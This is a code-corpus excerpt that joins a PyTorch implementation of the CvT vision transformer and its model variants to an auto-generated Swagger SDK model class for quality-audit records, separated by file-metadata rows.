        flops += T_Q * module.dim * T_KV
        if hasattr(module, 'conv_proj_q') and hasattr(module.conv_proj_q,
                                                      'conv'):
            params = sum(
                [p.numel() for p in module.conv_proj_q.conv.parameters()])
            flops += params * H_Q * W_Q
        if hasattr(module, 'conv_proj_k') and hasattr(module.conv_proj_k,
                                                      'conv'):
            params = sum(
                [p.numel() for p in module.conv_proj_k.conv.parameters()])
            flops += params * H_KV * W_KV
        if hasattr(module, 'conv_proj_v') and hasattr(module.conv_proj_v,
                                                      'conv'):
            params = sum(
                [p.numel() for p in module.conv_proj_v.conv.parameters()])
            flops += params * H_KV * W_KV
        params = sum([p.numel() for p in module.proj_q.parameters()])
        flops += params * T_Q
        params = sum([p.numel() for p in module.proj_k.parameters()])
        flops += params * T_KV
        params = sum([p.numel() for p in module.proj_v.parameters()])
        flops += params * T_KV
        params = sum([p.numel() for p in module.proj.parameters()])
        flops += params * T
        module.__flops__ += flops
class Block(nn.Module):
    """Pre-norm transformer block: conv-attention then MLP, each with a
    residual connection and optional stochastic depth."""

    def __init__(self,
                 dim_in,
                 dim_out,
                 num_heads,
                 mlp_ratio=4.,
                 qkv_bias=False,
                 drop=0.,
                 attn_drop=0.,
                 drop_path=0.,
                 act_layer=nn.GELU,
                 norm_layer=nn.LayerNorm,
                 **kwargs):
        super().__init__()
        self.with_cls_token = kwargs['with_cls_token']
        self.norm1 = norm_layer(dim_in)
        self.attn = Attention(dim_in, dim_out, num_heads, qkv_bias, attn_drop,
                              drop, **kwargs)
        # Stochastic depth on the residual branches; identity when disabled.
        self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity()
        self.norm2 = norm_layer(dim_out)
        hidden_dim = int(dim_out * mlp_ratio)
        self.mlp = Mlp(in_features=dim_out,
                       hidden_features=hidden_dim,
                       act_layer=act_layer,
                       drop=drop)

    def forward(self, x, h, w):
        """Apply the attention and MLP sub-blocks with residual connections."""
        shortcut = x
        x = shortcut + self.drop_path(self.attn(self.norm1(x), h, w))
        x = x + self.drop_path(self.mlp(self.norm2(x)))
        return x
class ConvEmbed(nn.Module):
    """Image to Conv Embedding.

    A strided convolution that tokenizes a (B, C, H, W) feature map,
    optionally layer-normalizing over the channel dimension, and returns
    the result back in (B, C, H', W') layout.
    """
    def __init__(self,
                 patch_size=7,
                 in_chans=3,
                 embed_dim=64,
                 stride=4,
                 padding=2,
                 norm_layer=None):
        super().__init__()
        patch_size = to_2tuple(patch_size)
        self.patch_size = patch_size
        self.proj = nn.Conv2d(in_chans,
                              embed_dim,
                              kernel_size=patch_size,
                              stride=stride,
                              padding=padding)
        self.norm = norm_layer(embed_dim) if norm_layer else None
    def forward(self, x):
        x = self.proj(x)
        B, C, H, W = x.shape
        # Flatten to token sequence so LayerNorm applies over channels,
        # then restore the spatial layout for the caller.
        x = rearrange(x, 'b c h w -> b (h w) c')
        if self.norm:
            x = self.norm(x)
        x = rearrange(x, 'b (h w) c -> b c h w', h=H, w=W)
        return x
class VisionTransformer(nn.Module):
    """Vision Transformer with support for patch or hybrid CNN input stage.

    One CvT "stage": a convolutional patch embedding followed by `depth`
    conv-attention Blocks. Returns the (B, C, H, W) token map plus the cls
    token (or None when the stage has no cls token).
    """
    def __init__(self,
                 patch_size=16,
                 patch_stride=16,
                 patch_padding=0,
                 in_chans=3,
                 embed_dim=768,
                 depth=12,
                 num_heads=12,
                 mlp_ratio=4.,
                 qkv_bias=False,
                 drop_rate=0.,
                 attn_drop_rate=0.,
                 drop_path_rate=0.,
                 act_layer=nn.GELU,
                 norm_layer=nn.LayerNorm,
                 init='trunc_norm',
                 **kwargs):
        super().__init__()
        self.num_features = self.embed_dim = embed_dim
        self.rearrage = None
        self.patch_embed = ConvEmbed(
            # img_size=img_size,
            patch_size=patch_size,
            in_chans=in_chans,
            stride=patch_stride,
            padding=patch_padding,
            embed_dim=embed_dim,
            norm_layer=norm_layer)
        with_cls_token = kwargs['with_cls_token']
        if with_cls_token:
            self.cls_token = nn.Parameter(torch.zeros(1, 1, embed_dim))
        else:
            self.cls_token = None
        self.pos_drop = nn.Dropout(p=drop_rate)
        # Per-block stochastic-depth rates, linearly increasing to
        # drop_path_rate over the stage's depth.
        dpr = [x.item() for x in torch.linspace(0, drop_path_rate, depth)]
        blocks = []
        for j in range(depth):
            blocks.append(
                Block(dim_in=embed_dim,
                      dim_out=embed_dim,
                      num_heads=num_heads,
                      mlp_ratio=mlp_ratio,
                      qkv_bias=qkv_bias,
                      drop=drop_rate,
                      attn_drop=attn_drop_rate,
                      drop_path=dpr[j],
                      act_layer=act_layer,
                      norm_layer=norm_layer,
                      **kwargs))
        self.blocks = nn.ModuleList(blocks)
        if self.cls_token is not None:
            trunc_normal_(self.cls_token, std=.02)
        if init == 'xavier':
            self.apply(self._init_weights_xavier)
        else:
            self.apply(self._init_weights_trunc_normal)
    def _init_weights_trunc_normal(self, m):
        # Linear weights from a truncated normal; norm layers to identity.
        if isinstance(m, nn.Linear):
            logging.info('=> init weight of Linear from trunc norm')
            trunc_normal_(m.weight, std=0.02)
            if m.bias is not None:
                logging.info('=> init bias of Linear to zeros')
                nn.init.constant_(m.bias, 0)
        elif isinstance(m, (nn.LayerNorm, nn.BatchNorm2d)):
            nn.init.constant_(m.bias, 0)
            nn.init.constant_(m.weight, 1.0)
    def _init_weights_xavier(self, m):
        # Linear weights Xavier-uniform; norm layers to identity.
        if isinstance(m, nn.Linear):
            logging.info('=> init weight of Linear from xavier uniform')
            nn.init.xavier_uniform_(m.weight)
            if m.bias is not None:
                logging.info('=> init bias of Linear to zeros')
                nn.init.constant_(m.bias, 0)
        elif isinstance(m, (nn.LayerNorm, nn.BatchNorm2d)):
            nn.init.constant_(m.bias, 0)
            nn.init.constant_(m.weight, 1.0)
    def forward(self, x):
        x = self.patch_embed(x)
        B, C, H, W = x.size()
        x = rearrange(x, 'b c h w -> b (h w) c')
        cls_tokens = None
        if self.cls_token is not None:
            # stole cls_tokens impl from Phil Wang, thanks
            cls_tokens = self.cls_token.expand(B, -1, -1)
            x = torch.cat((cls_tokens, x), dim=1)
        x = self.pos_drop(x)
        for i, blk in enumerate(self.blocks):
            x = blk(x, H, W)
        if self.cls_token is not None:
            cls_tokens, x = torch.split(x, [1, H * W], 1)
        x = rearrange(x, 'b (h w) c -> b c h w', h=H, w=W)
        return x, cls_tokens
class CvT(nn.Module):
    """Convolutional vision Transformer (https://github.com/microsoft/CvT).

    Builds `spec['NUM_STAGES']` VisionTransformer stages chained through
    their embedding widths. Classification uses the final stage's cls
    token when present, otherwise mean-pooled tokens.

    Fixes vs. the original:
    * ``init_weights`` compared ``pretrained_layers[0] is '*'`` — string
      identity is implementation-defined (SyntaxWarning on modern Python)
      and indexing the empty default list raised IndexError.
    * ``__init__`` called ``trunc_normal_(self.head.weight)`` even when the
      head is ``nn.Identity`` (num_classes == 0), raising AttributeError.
    """
    def __init__(self,
                 in_chans=3,
                 num_classes=1000,
                 act_layer=nn.GELU,
                 norm_layer=nn.LayerNorm,
                 init='trunc_norm',
                 spec=None):
        super().__init__()
        self.num_classes = num_classes
        self.num_stages = spec['NUM_STAGES']
        for i in range(self.num_stages):
            kwargs = {
                'patch_size': spec['PATCH_SIZE'][i],
                'patch_stride': spec['PATCH_STRIDE'][i],
                'patch_padding': spec['PATCH_PADDING'][i],
                'embed_dim': spec['DIM_EMBED'][i],
                'depth': spec['DEPTH'][i],
                'num_heads': spec['NUM_HEADS'][i],
                'mlp_ratio': spec['MLP_RATIO'][i],
                'qkv_bias': spec['QKV_BIAS'][i],
                'drop_rate': spec['DROP_RATE'][i],
                'attn_drop_rate': spec['ATTN_DROP_RATE'][i],
                'drop_path_rate': spec['DROP_PATH_RATE'][i],
                'with_cls_token': spec['CLS_TOKEN'][i],
                'method': spec['QKV_PROJ_METHOD'][i],
                'kernel_size': spec['KERNEL_QKV'][i],
                'padding_q': spec['PADDING_Q'][i],
                'padding_kv': spec['PADDING_KV'][i],
                'stride_kv': spec['STRIDE_KV'][i],
                'stride_q': spec['STRIDE_Q'][i],
            }
            stage = VisionTransformer(in_chans=in_chans,
                                      init=init,
                                      act_layer=act_layer,
                                      norm_layer=norm_layer,
                                      **kwargs)
            setattr(self, f'stage{i}', stage)
            # The next stage consumes this stage's embedding channels.
            in_chans = spec['DIM_EMBED'][i]
        self.num_features = spec['DIM_EMBED'][-1]
        self.norm = norm_layer(self.num_features)
        self.cls_token = spec['CLS_TOKEN'][-1]
        # Classifier head. Initialize weights only when it is a Linear layer
        # (nn.Identity has no .weight attribute).
        if num_classes > 0:
            self.head = nn.Linear(self.num_features, num_classes)
            trunc_normal_(self.head.weight, std=0.02)
        else:
            self.head = nn.Identity()
    def init_weights(self, pretrained='', pretrained_layers=[], verbose=True):
        """Load matching weights from a checkpoint file.

        Only keys whose top-level prefix is listed in `pretrained_layers`
        (or all keys, when the first entry is '*') are loaded; positional
        embeddings are bilinearly resized when grid sizes differ.
        """
        if os.path.isfile(pretrained):
            pretrained_dict = torch.load(pretrained, map_location='cpu')
            logging.info(f'=> loading pretrained model {pretrained}')
            model_dict = self.state_dict()
            pretrained_dict = {
                k: v
                for k, v in pretrained_dict.items() if k in model_dict.keys()
            }
            need_init_state_dict = {}
            for k, v in pretrained_dict.items():
                # Use == (value equality) instead of the original `is '*'`
                # identity test, and guard against the empty default list.
                need_init = (k.split('.')[0] in pretrained_layers
                             or (bool(pretrained_layers)
                                 and pretrained_layers[0] == '*'))
                if need_init:
                    if verbose:
                        logging.info(f'=> init {k} from {pretrained}')
                    if 'pos_embed' in k and v.size() != model_dict[k].size():
                        # Resize a positional embedding whose grid does not
                        # match: keep the cls slot, zoom the spatial grid.
                        size_pretrained = v.size()
                        size_new = model_dict[k].size()
                        logging.info(
                            '=> load_pretrained: resized variant: {} to {}'.
                            format(size_pretrained, size_new))
                        ntok_new = size_new[1]
                        ntok_new -= 1
                        posemb_tok, posemb_grid = v[:, :1], v[0, 1:]
                        gs_old = int(np.sqrt(len(posemb_grid)))
                        gs_new = int(np.sqrt(ntok_new))
                        logging.info(
                            '=> load_pretrained: grid-size from {} to {}'.
                            format(gs_old, gs_new))
                        posemb_grid = posemb_grid.reshape(gs_old, gs_old, -1)
                        zoom = (gs_new / gs_old, gs_new / gs_old, 1)
                        posemb_grid = scipy.ndimage.zoom(posemb_grid,
                                                         zoom,
                                                         order=1)
                        posemb_grid = posemb_grid.reshape(1, gs_new**2, -1)
                        v = torch.tensor(
                            np.concatenate([posemb_tok, posemb_grid], axis=1))
                    need_init_state_dict[k] = v
            self.load_state_dict(need_init_state_dict, strict=False)
    @torch.jit.ignore
    def no_weight_decay(self):
        """Parameter names excluded from weight decay (pos/cls embeddings)."""
        layers = set()
        for i in range(self.num_stages):
            layers.add(f'stage{i}.pos_embed')
            layers.add(f'stage{i}.cls_token')
        return layers
    def reset_classifier(self, num_classes):
        """Replace the classification head for a new number of classes."""
        if num_classes > 0:
            self.head = nn.Linear(self.num_features, num_classes)
        else:
            self.head = nn.Identity()
    def forward_features(self, x):
        """Run all stages and pool to a (B, num_features) embedding."""
        for i in range(self.num_stages):
            x, cls_tokens = getattr(self, f'stage{i}')(x)
        if self.cls_token:
            x_out = self.norm(cls_tokens)
            x_out = torch.squeeze(x_out, dim=1)
        else:
            x_out = rearrange(x, 'b c h w -> b (h w) c')
            x_out = self.norm(x_out)
            x_out = torch.mean(x_out, dim=1)
        return x_out
    def forward(self, x):
        x = self.forward_features(x)
        x = self.head(x)
        return x
def _create_cvt(variant, pretrained, **kwargs):
    """Instantiate a CvT variant via timm's builder, attaching its default
    pretrained config."""
    cfg = default_cfgs[variant]
    return build_model_with_cfg(
        CvT, variant, pretrained, default_cfg=cfg, **kwargs)
@register_model
def cvt_13_224(num_classes=1000, pretrained=False, **kwargs):
    """CvT-13 @ 224x224 (ImageNet-1k weights).

    `kwargs` are merged into the stage spec dict and may override any key.
    Fix: the spec is a plain dict, so the original
    ``getattr(msvit_spec, 'INIT', ...)`` always returned the default and
    silently ignored an 'INIT' override; ``dict.get`` honors it.
    """
    msvit_spec = {
        'INIT': 'trunc_norm',
        'NUM_STAGES': 3,
        'PATCH_SIZE': [7, 3, 3],
        'PATCH_STRIDE': [4, 2, 2],
        'PATCH_PADDING': [2, 1, 1],
        'DIM_EMBED': [64, 192, 384],
        'NUM_HEADS': [1, 3, 6],
        'DEPTH': [1, 2, 10],
        'MLP_RATIO': [4.0, 4.0, 4.0],
        'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_PATH_RATE': [0.0, 0.0, 0.1],
        'QKV_BIAS': [True, True, True],
        'CLS_TOKEN': [False, False, True],
        'POS_EMBED': [False, False, False],
        'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
        'KERNEL_QKV': [3, 3, 3],
        'PADDING_KV': [1, 1, 1],
        'STRIDE_KV': [2, 2, 2],
        'PADDING_Q': [1, 1, 1],
        'STRIDE_Q': [1, 1, 1],
    }
    msvit_spec.update(kwargs)
    msvit = _create_cvt('cvt_13_224',
                        pretrained,
                        in_chans=3,
                        num_classes=num_classes,
                        act_layer=QuickGELU,
                        norm_layer=partial(LayerNorm, eps=1e-5),
                        init=msvit_spec.get('INIT', 'trunc_norm'),
                        spec=msvit_spec)
    return msvit
@register_model
def cvt_13_384(num_classes=1000, pretrained=False, **kwargs):
    """CvT-13 @ 384x384 (ImageNet-1k weights).

    Fix: use ``dict.get`` instead of ``getattr`` on the spec dict so an
    'INIT' override passed through kwargs takes effect.
    """
    msvit_spec = {
        'INIT': 'trunc_norm',
        'NUM_STAGES': 3,
        'PATCH_SIZE': [7, 3, 3],
        'PATCH_STRIDE': [4, 2, 2],
        'PATCH_PADDING': [2, 1, 1],
        'DIM_EMBED': [64, 192, 384],
        'NUM_HEADS': [1, 3, 6],
        'DEPTH': [1, 2, 10],
        'MLP_RATIO': [4.0, 4.0, 4.0],
        'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_PATH_RATE': [0.0, 0.0, 0.1],
        'QKV_BIAS': [True, True, True],
        'CLS_TOKEN': [False, False, True],
        'POS_EMBED': [False, False, False],
        'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
        'KERNEL_QKV': [3, 3, 3],
        'PADDING_KV': [1, 1, 1],
        'STRIDE_KV': [2, 2, 2],
        'PADDING_Q': [1, 1, 1],
        'STRIDE_Q': [1, 1, 1],
    }
    msvit_spec.update(kwargs)
    msvit = _create_cvt('cvt_13_384',
                        pretrained,
                        in_chans=3,
                        num_classes=num_classes,
                        act_layer=QuickGELU,
                        norm_layer=partial(LayerNorm, eps=1e-5),
                        init=msvit_spec.get('INIT', 'trunc_norm'),
                        spec=msvit_spec)
    return msvit
@register_model
def cvt_13_384_22k(num_classes=1000, pretrained=False, **kwargs):
    """CvT-13 @ 384x384 (ImageNet-22k weights).

    Fix: use ``dict.get`` instead of ``getattr`` on the spec dict so an
    'INIT' override passed through kwargs takes effect.
    """
    msvit_spec = {
        'INIT': 'trunc_norm',
        'NUM_STAGES': 3,
        'PATCH_SIZE': [7, 3, 3],
        'PATCH_STRIDE': [4, 2, 2],
        'PATCH_PADDING': [2, 1, 1],
        'DIM_EMBED': [64, 192, 384],
        'NUM_HEADS': [1, 3, 6],
        'DEPTH': [1, 2, 10],
        'MLP_RATIO': [4.0, 4.0, 4.0],
        'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_PATH_RATE': [0.0, 0.0, 0.1],
        'QKV_BIAS': [True, True, True],
        'CLS_TOKEN': [False, False, True],
        'POS_EMBED': [False, False, False],
        'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
        'KERNEL_QKV': [3, 3, 3],
        'PADDING_KV': [1, 1, 1],
        'STRIDE_KV': [2, 2, 2],
        'PADDING_Q': [1, 1, 1],
        'STRIDE_Q': [1, 1, 1],
    }
    msvit_spec.update(kwargs)
    msvit = _create_cvt('cvt_13_384_22k',
                        pretrained,
                        in_chans=3,
                        num_classes=num_classes,
                        act_layer=QuickGELU,
                        norm_layer=partial(LayerNorm, eps=1e-5),
                        init=msvit_spec.get('INIT', 'trunc_norm'),
                        spec=msvit_spec)
    return msvit
@register_model
def cvt_21_224(num_classes=1000, pretrained=False, **kwargs):
    """CvT-21 @ 224x224 (ImageNet-1k weights).

    Fix: use ``dict.get`` instead of ``getattr`` on the spec dict so an
    'INIT' override passed through kwargs takes effect.
    """
    msvit_spec = {
        'INIT': 'trunc_norm',
        'NUM_STAGES': 3,
        'PATCH_SIZE': [7, 3, 3],
        'PATCH_STRIDE': [4, 2, 2],
        'PATCH_PADDING': [2, 1, 1],
        'DIM_EMBED': [64, 192, 384],
        'NUM_HEADS': [1, 3, 6],
        'DEPTH': [1, 4, 16],
        'MLP_RATIO': [4.0, 4.0, 4.0],
        'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_PATH_RATE': [0.0, 0.0, 0.1],
        'QKV_BIAS': [True, True, True],
        'CLS_TOKEN': [False, False, True],
        'POS_EMBED': [False, False, False],
        'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
        'KERNEL_QKV': [3, 3, 3],
        'PADDING_KV': [1, 1, 1],
        'STRIDE_KV': [2, 2, 2],
        'PADDING_Q': [1, 1, 1],
        'STRIDE_Q': [1, 1, 1],
    }
    msvit_spec.update(kwargs)
    msvit = _create_cvt('cvt_21_224',
                        pretrained,
                        in_chans=3,
                        num_classes=num_classes,
                        act_layer=QuickGELU,
                        norm_layer=partial(LayerNorm, eps=1e-5),
                        init=msvit_spec.get('INIT', 'trunc_norm'),
                        spec=msvit_spec)
    return msvit
@register_model
def cvt_21_384(num_classes=1000, pretrained=False, **kwargs):
    """CvT-21 @ 384x384 (ImageNet-1k weights).

    Fix: use ``dict.get`` instead of ``getattr`` on the spec dict so an
    'INIT' override passed through kwargs takes effect.
    """
    msvit_spec = {
        'INIT': 'trunc_norm',
        'NUM_STAGES': 3,
        'PATCH_SIZE': [7, 3, 3],
        'PATCH_STRIDE': [4, 2, 2],
        'PATCH_PADDING': [2, 1, 1],
        'DIM_EMBED': [64, 192, 384],
        'NUM_HEADS': [1, 3, 6],
        'DEPTH': [1, 4, 16],
        'MLP_RATIO': [4.0, 4.0, 4.0],
        'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_PATH_RATE': [0.0, 0.0, 0.1],
        'QKV_BIAS': [True, True, True],
        'CLS_TOKEN': [False, False, True],
        'POS_EMBED': [False, False, False],
        'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
        'KERNEL_QKV': [3, 3, 3],
        'PADDING_KV': [1, 1, 1],
        'STRIDE_KV': [2, 2, 2],
        'PADDING_Q': [1, 1, 1],
        'STRIDE_Q': [1, 1, 1],
    }
    msvit_spec.update(kwargs)
    msvit = _create_cvt('cvt_21_384',
                        pretrained,
                        in_chans=3,
                        num_classes=num_classes,
                        act_layer=QuickGELU,
                        norm_layer=partial(LayerNorm, eps=1e-5),
                        init=msvit_spec.get('INIT', 'trunc_norm'),
                        spec=msvit_spec)
    return msvit
@register_model
def cvt_21_384_22k(num_classes=1000, pretrained=False, **kwargs):
    """CvT-21 @ 384x384 (ImageNet-22k weights).

    Fix: use ``dict.get`` instead of ``getattr`` on the spec dict so an
    'INIT' override passed through kwargs takes effect.
    """
    msvit_spec = {
        'INIT': 'trunc_norm',
        'NUM_STAGES': 3,
        'PATCH_SIZE': [7, 3, 3],
        'PATCH_STRIDE': [4, 2, 2],
        'PATCH_PADDING': [2, 1, 1],
        'DIM_EMBED': [64, 192, 384],
        'NUM_HEADS': [1, 3, 6],
        'DEPTH': [1, 4, 16],
        'MLP_RATIO': [4.0, 4.0, 4.0],
        'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_PATH_RATE': [0.0, 0.0, 0.1],
        'QKV_BIAS': [True, True, True],
        'CLS_TOKEN': [False, False, True],
        'POS_EMBED': [False, False, False],
        'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
        'KERNEL_QKV': [3, 3, 3],
        'PADDING_KV': [1, 1, 1],
        'STRIDE_KV': [2, 2, 2],
        'PADDING_Q': [1, 1, 1],
        'STRIDE_Q': [1, 1, 1],
    }
    msvit_spec.update(kwargs)
    msvit = _create_cvt('cvt_21_384_22k',
                        pretrained,
                        in_chans=3,
                        num_classes=num_classes,
                        act_layer=QuickGELU,
                        norm_layer=partial(LayerNorm, eps=1e-5),
                        init=msvit_spec.get('INIT', 'trunc_norm'),
                        spec=msvit_spec)
    return msvit
@register_model
def cvt_w24(num_classes=1000, pretrained=False, **kwargs):
    """CvT-W24 (wide, 24-block) variant.

    Fix: use ``dict.get`` instead of ``getattr`` on the spec dict so an
    'INIT' override passed through kwargs takes effect.
    """
    msvit_spec = {
        'INIT': 'trunc_norm',
        'NUM_STAGES': 3,
        'PATCH_SIZE': [7, 3, 3],
        'PATCH_STRIDE': [4, 2, 2],
        'PATCH_PADDING': [2, 1, 1],
        'DIM_EMBED': [192, 768, 1024],
        'NUM_HEADS': [3, 12, 16],
        'DEPTH': [2, 2, 20],
        'MLP_RATIO': [4.0, 4.0, 4.0],
        'ATTN_DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_RATE': [0.0, 0.0, 0.0],
        'DROP_PATH_RATE': [0.0, 0.0, 0.3],
        'QKV_BIAS': [True, True, True],
        'CLS_TOKEN': [False, False, True],
        'POS_EMBED': [False, False, False],
        'QKV_PROJ_METHOD': ['dw_bn', 'dw_bn', 'dw_bn'],
        'KERNEL_QKV': [3, 3, 3],
        'PADDING_KV': [1, 1, 1],
        'STRIDE_KV': [2, 2, 2],
        'PADDING_Q': [1, 1, 1],
        'STRIDE_Q': [1, 1, 1],
    }
    msvit_spec.update(kwargs)
    msvit = _create_cvt('cvt_w24',
                        pretrained,
                        in_chans=3,
                        num_classes=num_classes,
                        act_layer=QuickGELU,
                        norm_layer=partial(LayerNorm, eps=1e-5),
                        init=msvit_spec.get('INIT', 'trunc_norm'),
                        spec=msvit_spec)
    return msvit
ace94916533d70c920a9035b9b419e67d056630c | 9,575 | py | Python | build/PureCloudPlatformClientV2/models/quality_audit.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | null | null | null | build/PureCloudPlatformClientV2/models/quality_audit.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | null | null | null | build/PureCloudPlatformClientV2/models/quality_audit.py | cjohnson-ctl/platform-client-sdk-python | 38ce53bb8012b66e8a43cc8bd6ff00cf6cc99100 | [
"MIT"
] | null | null | null | # coding: utf-8
"""
Copyright 2016 SmartBear Software
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
Ref: https://github.com/swagger-api/swagger-codegen
"""
from pprint import pformat
from six import iteritems
import re
import json
from ..utils import sanitize_for_serialization
class QualityAudit(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
    def __init__(self):
        """
        QualityAudit - a model defined in Swagger

        :param dict swaggerTypes: The key is attribute name
                                  and the value is attribute type.
        :param dict attributeMap: The key is attribute name
                                  and the value is json key in definition.
        """
        # Maps each Python attribute name to its swagger type string; used
        # by the generated (de)serialization machinery.
        self.swagger_types = {
            'id': 'str',
            'name': 'str',
            'user': 'User',
            'job_id': 'str',
            'action': 'str',
            'entity': 'AuditEntity',
            'level': 'str',
            'timestamp': 'str',
            'status': 'str',
            'changes': 'list[Change]',
            'entity_type': 'str',
            'self_uri': 'str'
        }
        # Maps each Python attribute name to its JSON key in the API payload.
        self.attribute_map = {
            'id': 'id',
            'name': 'name',
            'user': 'user',
            'job_id': 'jobId',
            'action': 'action',
            'entity': 'entity',
            'level': 'level',
            'timestamp': 'timestamp',
            'status': 'status',
            'changes': 'changes',
            'entity_type': 'entityType',
            'self_uri': 'selfUri'
        }
        # Backing fields for the generated properties; all start unset.
        self._id = None
        self._name = None
        self._user = None
        self._job_id = None
        self._action = None
        self._entity = None
        self._level = None
        self._timestamp = None
        self._status = None
        self._changes = None
        self._entity_type = None
        self._self_uri = None
@property
def id(self):
"""
Gets the id of this QualityAudit.
The globally unique identifier for the object.
:return: The id of this QualityAudit.
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""
Sets the id of this QualityAudit.
The globally unique identifier for the object.
:param id: The id of this QualityAudit.
:type: str
"""
self._id = id
@property
def name(self):
"""
Gets the name of this QualityAudit.
:return: The name of this QualityAudit.
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""
Sets the name of this QualityAudit.
:param name: The name of this QualityAudit.
:type: str
"""
self._name = name
@property
def user(self):
"""
Gets the user of this QualityAudit.
:return: The user of this QualityAudit.
:rtype: User
"""
return self._user
@user.setter
def user(self, user):
"""
Sets the user of this QualityAudit.
:param user: The user of this QualityAudit.
:type: User
"""
self._user = user
@property
def job_id(self):
"""
Gets the job_id of this QualityAudit.
:return: The job_id of this QualityAudit.
:rtype: str
"""
return self._job_id
@job_id.setter
def job_id(self, job_id):
"""
Sets the job_id of this QualityAudit.
:param job_id: The job_id of this QualityAudit.
:type: str
"""
self._job_id = job_id
@property
def action(self):
"""
Gets the action of this QualityAudit.
:return: The action of this QualityAudit.
:rtype: str
"""
return self._action
@action.setter
def action(self, action):
"""
Sets the action of this QualityAudit.
:param action: The action of this QualityAudit.
:type: str
"""
self._action = action
@property
def entity(self):
"""
Gets the entity of this QualityAudit.
:return: The entity of this QualityAudit.
:rtype: AuditEntity
"""
return self._entity
@entity.setter
def entity(self, entity):
"""
Sets the entity of this QualityAudit.
:param entity: The entity of this QualityAudit.
:type: AuditEntity
"""
self._entity = entity
@property
def level(self):
"""
Gets the level of this QualityAudit.
:return: The level of this QualityAudit.
:rtype: str
"""
return self._level
@level.setter
def level(self, level):
"""
Sets the level of this QualityAudit.
:param level: The level of this QualityAudit.
:type: str
"""
self._level = level
@property
def timestamp(self):
"""
Gets the timestamp of this QualityAudit.
:return: The timestamp of this QualityAudit.
:rtype: str
"""
return self._timestamp
@timestamp.setter
def timestamp(self, timestamp):
"""
Sets the timestamp of this QualityAudit.
:param timestamp: The timestamp of this QualityAudit.
:type: str
"""
self._timestamp = timestamp
@property
def status(self):
"""
Gets the status of this QualityAudit.
:return: The status of this QualityAudit.
:rtype: str
"""
return self._status
@status.setter
def status(self, status):
"""
Sets the status of this QualityAudit.
:param status: The status of this QualityAudit.
:type: str
"""
self._status = status
@property
def changes(self):
"""
Gets the changes of this QualityAudit.
:return: The changes of this QualityAudit.
:rtype: list[Change]
"""
return self._changes
@changes.setter
def changes(self, changes):
"""
Sets the changes of this QualityAudit.
:param changes: The changes of this QualityAudit.
:type: list[Change]
"""
self._changes = changes
@property
def entity_type(self):
"""
Gets the entity_type of this QualityAudit.
:return: The entity_type of this QualityAudit.
:rtype: str
"""
return self._entity_type
@entity_type.setter
def entity_type(self, entity_type):
"""
Sets the entity_type of this QualityAudit.
:param entity_type: The entity_type of this QualityAudit.
:type: str
"""
self._entity_type = entity_type
@property
def self_uri(self):
"""
Gets the self_uri of this QualityAudit.
The URI for this object
:return: The self_uri of this QualityAudit.
:rtype: str
"""
return self._self_uri
@self_uri.setter
def self_uri(self, self_uri):
"""
Sets the self_uri of this QualityAudit.
The URI for this object
:param self_uri: The self_uri of this QualityAudit.
:type: str
"""
self._self_uri = self_uri
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_json(self):
"""
Returns the model as raw JSON
"""
return json.dumps(sanitize_for_serialization(self.to_dict()))
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 22.961631 | 77 | 0.533055 |
ace94a54535e41958b512831a63e148169c4d261 | 21,169 | py | Python | nnunet/training/loss_functions/dice_loss.py | SarielMa/nnUNet | f9975139c7d8010bdf0415f7fd32a53022d30a69 | [
"Apache-2.0"
] | null | null | null | nnunet/training/loss_functions/dice_loss.py | SarielMa/nnUNet | f9975139c7d8010bdf0415f7fd32a53022d30a69 | [
"Apache-2.0"
] | null | null | null | nnunet/training/loss_functions/dice_loss.py | SarielMa/nnUNet | f9975139c7d8010bdf0415f7fd32a53022d30a69 | [
"Apache-2.0"
] | null | null | null | # Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
#
# Licensed under the Apache License, Version 2.0 (the "License");
